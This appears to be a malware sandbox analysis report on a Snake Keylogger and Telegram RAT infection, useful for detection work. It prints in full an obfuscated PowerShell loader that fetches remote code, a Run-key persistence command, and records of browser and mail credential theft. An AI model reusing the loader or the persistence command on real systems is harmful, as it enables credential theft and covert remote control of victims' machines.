              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Horrify; function Uprouse15($Fastigiate){$Bovate=4;do{$Cataracted+=$Fastigiate[$Bovate];$Bovate+=5;$Preciosities=Format-List} until(!$Fastigiate[$Bovate])$Cataracted}function Testvrktjer($Pericemental){ .($Unplutocratically) ($Pericemental)}$Tagdkker=Uprouse15 ' HusnUdboe Flltregu.,lnsw';$Tagdkker+=Uprouse15 'tersEGrabBNo.aCC.ckLHjteISuprE AndnRenlT';$Rootfast=Uprouse15 'I baM SrsoAwonzU.deiA.rel enslKonta rio/';$Bovatendskudsstning=Uprouse15 'In lTSekulUndesprec1 R c2';$Matricides=' Iko[H isNperie ProT Til.E ems Yane ugtrHjerV ChoIAftecD,taeCoagpChifoServiLevenSkaltEudamPolyAGastNCardaSi kG Ap.eBrutrBuli]Beds: Tan:K losFesteSquiC avpU BomrId oI coptRecoYKnhjpHa eRRa,eo VitT RanO ntCSu sOTerslHepa=opsl$Kns.bDe.oOBankVJow a HygtFo sE KltNEntodAfs,Sre.uKLeftUFormDOranSSquasSorttRealNGalliGiv NMicrG';$Rootfast+=Uprouse15 ' Bri5ad i.Atro0St.k For(hoveWSelviC rcnNin.dLogaoAmniwTri sMetr klatN ArcTGurg Bue1 hri0po d.Ki o0 in;bo d vbniWUntui CounPeri6Capo4Sa e;Va p S,rix wa6Sca 4Mave;peer skar Nurv ko:Tra 1 Cry3over4town.Fors0men.)Edel SumGButieLem c UdskDiaroAlcm/ Van2Ti s0 ,be1,etr0Refl0Gang1Gl t0 Syt1 Sub AlcF SpoiUnder Ab eTy efDobboH.arxInbo/Semi1Si.u3Prem4,oni.M.zu0';$Hydroida=Uprouse15 'SchiuNonfs BibeRiveRMeta-InhaaArtsgUnswegrooN Rect';$Efterabelserne174=Uprouse15 'PolyhKravtStyrtAfrep Sp.sMarx:F re/Regn/ JosoTagdo G drStreiMe.og.anaiSeminIn xaRudslBleru ,edsConceMonadTyro. vivcDagpoPl dm Cre/I.dtln neodemirFo sdPalo/SokkRGenmeSarci ,ramUdmea Pl gFartiArmin agteMoi..BovnpLab rAktim';$Smreplsen78=Uprouse15 ' Apo>';$Unplutocratically=Uprouse15 'StakI CofeSvovX';$Fodboldes='Sygevarsler';$Barakkens='\Sammenbinder.Moe';Testvrktjer (Uprouse15 ' Pri$HjergVeltlmonoOK,rsbUdsea StelAsja:Lo tA.forNTffenG lvU Astl OraO ilISpladHuj = elg$FaguESiniNDetav ase:IdenAHjfoPk.shP Un,DZe,haTommtStilAT an+dyka$Ca bB ysiA angrpremaB nekAntiKSl nEBu.lN unsS');Testvrktjer (Uprouse15 ' gho$WildGEntrLMi eo Saib VenaSmaaLD.lu:Sni.sRadiPPhonI geaSD moeMu iPUnsul T tiIschGE,trtAish1 Fri5 dfo=unod$ Ud EBaudFCongtB,steTaklREnspA Norb Anae HveLUdfas yntEImp R LusNWashEIsil1 Opt7fo,e4Vi a.knalsI,teP EpilB,lliAncytKkke(Tant$SyntSUrinm S.cR Bate Ko,p agbl SeaSRygme Miln Ch.7Triu8Pa i)');Testvrktjer (Uprouse15 $Matricides);$Efterabelserne174=$Spisepligt15[0];$Bodgery=(Uprouse15 ' Inq$Om,igjackLCacoOBlisBUdklA uinLFo.s:Ani uLudvnUdhuMPel,aGastsAcalTPassE inRSp cfS.aau A,kLRegn=ProsnKoekEAmerwAfso-Ho ooPeptBLangJ CryEMat cTeleT Co To lsRec yL geS UnuTSkygesuprM ork. Rip$Fri tcoc a ewaGBrdrDAlulK TafK PosEPne r');Testvrktjer ($Bodgery);Testvrktjer (Uprouse15 'Tyfo$Mou UAr,inIntemBeviaM nisRod,tKimbeTimerUngrf eeuVitalOver.BoflHSeaseM craN.grdTilgeskibrChe.sD el[ Unf$ MurH,hefyBadidNov rM xioJo siReped Ek,aHome]Mic =Dupl$Ls,eRUdsko aaodhaitAnsafSkinaTrefsMoist');$Saaede=Uprouse15 ' For$ BraUTegnn Benmn nva .tesHandt,edre EnsrU frfBestu.xillBjrg.BaiJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $horrify; function uprouse15($fastigiate){$bovate=4;do{$cataracted+=$fastigiate[$bovate];$bovate+=5;$preciosities=format-list} until(!$fastigiate[$bovate])$cataracted}function testvrktjer($pericemental){ .($unplutocratically) ($pericemental)}$tagdkker=uprouse15 ' husnudboe flltregu.,lnsw';$tagdkker+=uprouse15 'tersegrabbno.acc.cklhjteisupre andnrenlt';$rootfast=uprouse15 'i bam srsoawonzu.deia.rel enslkonta rio/';$bovatendskudsstning=uprouse15 'in ltsekulundesprec1 r c2';$matricides=' iko[h isnperie prot til.e ems yane ugtrhjerv choiaftecd,taecoagpchifoservilevenskalteudampolyagastncardasi kg ap.ebrutrbuli]beds: tan:k losfestesquic avpu bomrid oi coptrecoyknhjpha erra,eo vitt rano ntcsu soterslhepa=opsl$kns.bde.oobankvjow a hygtfo se kltnentodafs,sre.ukleftuformdoranssquassorttrealngalligiv nmicrg';$rootfast+=uprouse15 ' bri5ad i.atro0st.k for(hovewselvic rcnnin.dlogaoamniwtri smetr klatn arctgurg bue1 hri0po d.ki o0 in;bo d vbniwuntui counperi6capo4sa e;va p s,rix wa6sca 4mave;peer skar nurv ko:tra 1 cry3over4town.fors0men.)edel sumgbutielem c udskdiaroalcm/ van2ti s0 ,be1,etr0refl0gang1gl t0 syt1 sub alcf spoiunder ab ety efdobboh.arxinbo/semi1si.u3prem4,oni.m.zu0';$hydroida=uprouse15 'schiunonfs biberivermeta-inhaaartsgunswegroon rect';$efterabelserne174=uprouse15 'polyhkravtstyrtafrep sp.smarx:f re/regn/ josotagdo g drstreime.og.anaiseminin xarudslbleru ,edsconcemonadtyro. vivcdagpopl dm cre/i.dtln neodemirfo sdpalo/sokkrgenmesarci ,ramudmea pl gfartiarmin agtemoi..bovnplab raktim';$smreplsen78=uprouse15 ' apo>';$unplutocratically=uprouse15 'staki cofesvovx';$fodboldes='sygevarsler';$barakkens='\sammenbinder.moe';testvrktjer (uprouse15 ' pri$hjergveltlmonook,rsbudsea stelasja:lo ta.forntffeng lvu astl orao ilispladhuj = elg$faguesinindetav ase:idenahjfopk.shp un,dze,hatommtstilat an+dyka$ca bb ysia angrpremab nekantiksl nebu.ln unss');testvrktjer (uprouse15 ' gho$wildgentrlmi eo saib venasmaald.lu:sni.sradipphoni geasd moemu ipunsul t tiischge,trtaish1 fri5 dfo=unod$ ud ebaudfcongtb,stetaklrenspa norb anae hveludfas ynteimp r lusnwasheisil1 opt7fo,e4vi a.knalsi,tep epilb,lliancytkkke(tant$syntsurinm s.cr bate ko,p agbl seasrygme miln ch.7triu8pa i)');testvrktjer (uprouse15 $matricides);$efterabelserne174=$spisepligt15[0];$bodgery=(uprouse15 ' inq$om,igjacklcacooblisbudkla uinlfo.s:ani uludvnudhumpel,agastsacaltpasse inrsp cfs.aau a,klregn=prosnkoekeamerwafso-ho oopeptblangj cryemat ctelet co to lsrec yl ges unutskygesuprm ork. rip$fri tcoc a ewagbrdrdalulk tafk posepne r');testvrktjer ($bodgery);testvrktjer (uprouse15 'tyfo$mou uar,inintembeviam nisrod,tkimbetimerungrf eeuvitalover.boflhseasem cran.grdtilgeskibrche.sd el[ unf$ murh,hefybadidnov rm xiojo sireped ek,ahome]mic =dupl$ls,erudsko aaodhaitansafskinatrefsmoist');$saaede=uprouse15 ' for$ brautegnn benmn nva .teshandt,edre ensru frfbestu.xillbjrg.bai
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "echo $horrify; function uprouse15($fastigiate){$bovate=4;do{$cataracted+=$fastigiate[$bovate];$bovate+=5;$preciosities=format-list} until(!$fastigiate[$bovate])$cataracted}function testvrktjer($pericemental){ .($unplutocratically) ($pericemental)}$tagdkker=uprouse15 ' husnudboe flltregu.,lnsw';$tagdkker+=uprouse15 'tersegrabbno.acc.cklhjteisupre andnrenlt';$rootfast=uprouse15 'i bam srsoawonzu.deia.rel enslkonta rio/';$bovatendskudsstning=uprouse15 'in ltsekulundesprec1 r c2';$matricides=' iko[h isnperie prot til.e ems yane ugtrhjerv choiaftecd,taecoagpchifoservilevenskalteudampolyagastncardasi kg ap.ebrutrbuli]beds: tan:k losfestesquic avpu bomrid oi coptrecoyknhjpha erra,eo vitt rano ntcsu soterslhepa=opsl$kns.bde.oobankvjow a hygtfo se kltnentodafs,sre.ukleftuformdoranssquassorttrealngalligiv nmicrg';$rootfast+=uprouse15 ' bri5ad i.atro0st.k for(hovewselvic rcnnin.dlogaoamniwtri smetr klatn arctgurg bue1 hri0po d.ki o0 in;bo d vbniwuntui counperi6capo4sa e;va p s,rix wa6sca 4mave;peer skar nurv ko:tra 1 cry3over4town.fors0men.)edel sumgbutielem c udskdiaroalcm/ van2ti s0 ,be1,etr0refl0gang1gl t0 syt1 sub alcf spoiunder ab ety efdobboh.arxinbo/semi1si.u3prem4,oni.m.zu0';$hydroida=uprouse15 'schiunonfs biberivermeta-inhaaartsgunswegroon rect';$efterabelserne174=uprouse15 'polyhkravtstyrtafrep sp.smarx:f re/regn/ josotagdo g drstreime.og.anaiseminin xarudslbleru ,edsconcemonadtyro. vivcdagpopl dm cre/i.dtln neodemirfo sdpalo/sokkrgenmesarci ,ramudmea pl gfartiarmin agtemoi..bovnplab raktim';$smreplsen78=uprouse15 ' apo>';$unplutocratically=uprouse15 'staki cofesvovx';$fodboldes='sygevarsler';$barakkens='\sammenbinder.moe';testvrktjer (uprouse15 ' pri$hjergveltlmonook,rsbudsea stelasja:lo ta.forntffeng lvu astl orao ilispladhuj = elg$faguesinindetav ase:idenahjfopk.shp un,dze,hatommtstilat an+dyka$ca bb ysia angrpremab nekantiksl nebu.ln unss');testvrktjer (uprouse15 ' gho$wildgentrlmi eo saib venasmaald.lu:sni.sradipphoni geasd moemu ipunsul t tiischge,trtaish1 fri5 dfo=unod$ ud ebaudfcongtb,stetaklrenspa norb anae hveludfas ynteimp r lusnwasheisil1 opt7fo,e4vi a.knalsi,tep epilb,lliancytkkke(tant$syntsurinm s.cr bate ko,p agbl seasrygme miln ch.7triu8pa i)');testvrktjer (uprouse15 $matricides);$efterabelserne174=$spisepligt15[0];$bodgery=(uprouse15 ' inq$om,igjacklcacooblisbudkla uinlfo.s:ani uludvnudhumpel,agastsacaltpasse inrsp cfs.aau a,klregn=prosnkoekeamerwafso-ho oopeptblangj cryemat ctelet co to lsrec yl ges unutskygesuprm ork. rip$fri tcoc a ewagbrdrdalulk tafk posepne r');testvrktjer ($bodgery);testvrktjer (uprouse15 'tyfo$mou uar,inintembeviam nisrod,tkimbetimerungrf eeuvitalover.boflhseasem cran.grdtilgeskibrche.sd el[ unf$ murh,hefybadidnov rm xiojo sireped ek,ahome]mic =dupl$ls,erudsko aaodhaitansafskinatrefsmoist');$saaede=uprouse15 ' for$ brautegnn benmn nva .teshandt,edre ensru frfbestu.xillbjrg.bai
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add "hkcu\software\microsoft\windows\currentversion\run" /f /v "litteraturlistes" /t reg_expand_sz /d "%hochelaga% -windowstyle 1 $saltires=(gi 'hkcu:\software\wormseeds\').getvalue('engangsforeteelsens184');%hochelaga% ($saltires)"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $horrify; function uprouse15($fastigiate){$bovate=4;do{$cataracted+=$fastigiate[$bovate];$bovate+=5;$preciosities=format-list} until(!$fastigiate[$bovate])$cataracted}function testvrktjer($pericemental){ .($unplutocratically) ($pericemental)}$tagdkker=uprouse15 ' husnudboe flltregu.,lnsw';$tagdkker+=uprouse15 'tersegrabbno.acc.cklhjteisupre andnrenlt';$rootfast=uprouse15 'i bam srsoawonzu.deia.rel enslkonta rio/';$bovatendskudsstning=uprouse15 'in ltsekulundesprec1 r c2';$matricides=' iko[h isnperie prot til.e ems yane ugtrhjerv choiaftecd,taecoagpchifoservilevenskalteudampolyagastncardasi kg ap.ebrutrbuli]beds: tan:k losfestesquic avpu bomrid oi coptrecoyknhjpha erra,eo vitt rano ntcsu soterslhepa=opsl$kns.bde.oobankvjow a hygtfo se kltnentodafs,sre.ukleftuformdoranssquassorttrealngalligiv nmicrg';$rootfast+=uprouse15 ' bri5ad i.atro0st.k for(hovewselvic rcnnin.dlogaoamniwtri smetr klatn arctgurg bue1 hri0po d.ki o0 in;bo d vbniwuntui counperi6capo4sa e;va p s,rix wa6sca 4mave;peer skar nurv ko:tra 1 cry3over4town.fors0men.)edel sumgbutielem c udskdiaroalcm/ van2ti s0 ,be1,etr0refl0gang1gl t0 syt1 sub alcf spoiunder ab ety efdobboh.arxinbo/semi1si.u3prem4,oni.m.zu0';$hydroida=uprouse15 'schiunonfs biberivermeta-inhaaartsgunswegroon rect';$efterabelserne174=uprouse15 'polyhkravtstyrtafrep sp.smarx:f re/regn/ josotagdo g drstreime.og.anaiseminin xarudslbleru ,edsconcemonadtyro. vivcdagpopl dm cre/i.dtln neodemirfo sdpalo/sokkrgenmesarci ,ramudmea pl gfartiarmin agtemoi..bovnplab raktim';$smreplsen78=uprouse15 ' apo>';$unplutocratically=uprouse15 'staki cofesvovx';$fodboldes='sygevarsler';$barakkens='\sammenbinder.moe';testvrktjer (uprouse15 ' pri$hjergveltlmonook,rsbudsea stelasja:lo ta.forntffeng lvu astl orao ilispladhuj = elg$faguesinindetav ase:idenahjfopk.shp un,dze,hatommtstilat an+dyka$ca bb ysia angrpremab nekantiksl nebu.ln unss');testvrktjer (uprouse15 ' gho$wildgentrlmi eo saib venasmaald.lu:sni.sradipphoni geasd moemu ipunsul t tiischge,trtaish1 fri5 dfo=unod$ ud ebaudfcongtb,stetaklrenspa norb anae hveludfas ynteimp r lusnwasheisil1 opt7fo,e4vi a.knalsi,tep epilb,lliancytkkke(tant$syntsurinm s.cr bate ko,p agbl seasrygme miln ch.7triu8pa i)');testvrktjer (uprouse15 $matricides);$efterabelserne174=$spisepligt15[0];$bodgery=(uprouse15 ' inq$om,igjacklcacooblisbudkla uinlfo.s:ani uludvnudhumpel,agastsacaltpasse inrsp cfs.aau a,klregn=prosnkoekeamerwafso-ho oopeptblangj cryemat ctelet co to lsrec yl ges unutskygesuprm ork. rip$fri tcoc a ewagbrdrdalulk tafk posepne r');testvrktjer ($bodgery);testvrktjer (uprouse15 'tyfo$mou uar,inintembeviam nisrod,tkimbetimerungrf eeuvitalover.boflhseasem cran.grdtilgeskibrche.sd el[ unf$ murh,hefybadidnov rm xiojo sireped ek,ahome]mic =dupl$ls,erudsko aaodhaitansafskinatrefsmoist');$saaede=uprouse15 ' for$ brautegnn benmn nva .teshandt,edre ensru frfbestu.xillbjrg.baiJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add "hkcu\software\microsoft\windows\currentversion\run" /f /v "litteraturlistes" /t reg_expand_sz /d "%hochelaga% -windowstyle 1 $saltires=(gi 'hkcu:\software\wormseeds\').getvalue('engangsforeteelsens184');%hochelaga% ($saltires)"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Snake Keylogger
              Source: Yara matchFile source: 0000000F.00000002.2230198077.0000000020AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Yara detected Telegram RAT
              Source: Yara matchFile source: 0000000F.00000002.2232887715.0000000022BFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.2230198077.0000000020CBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5216, type: MEMORYSTR
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5216, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Snake Keylogger
              Source: Yara matchFile source: 0000000F.00000002.2230198077.0000000020AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Yara detected Telegram RAT
              Source: Yara matchFile source: 0000000F.00000002.2232887715.0000000022BFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.2230198077.0000000020CBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5216, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information11
              Scripting              		Valid Accounts11
              Windows Management Instrumentation              		11
              Scripting              		1
              DLL Side-Loading              		2
              Obfuscated Files or Information              		1
              OS Credential Dumping              		1
              File and Directory Discovery              		Remote Services1
              Archive Collected Data              		1
              Web Service              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Exploitation for Client Execution              		1
              DLL Side-Loading              		311
              Process Injection              		1
              Software Packing              		LSASS Memory23
              System Information Discovery              		Remote Desktop Protocol1
              Data from Local System              		3
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              Command and Scripting Interpreter              		1
              Registry Run Keys / Startup Folder              		1
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		Security Account Manager11
              Security Software Discovery              		SMB/Windows Admin Shares1
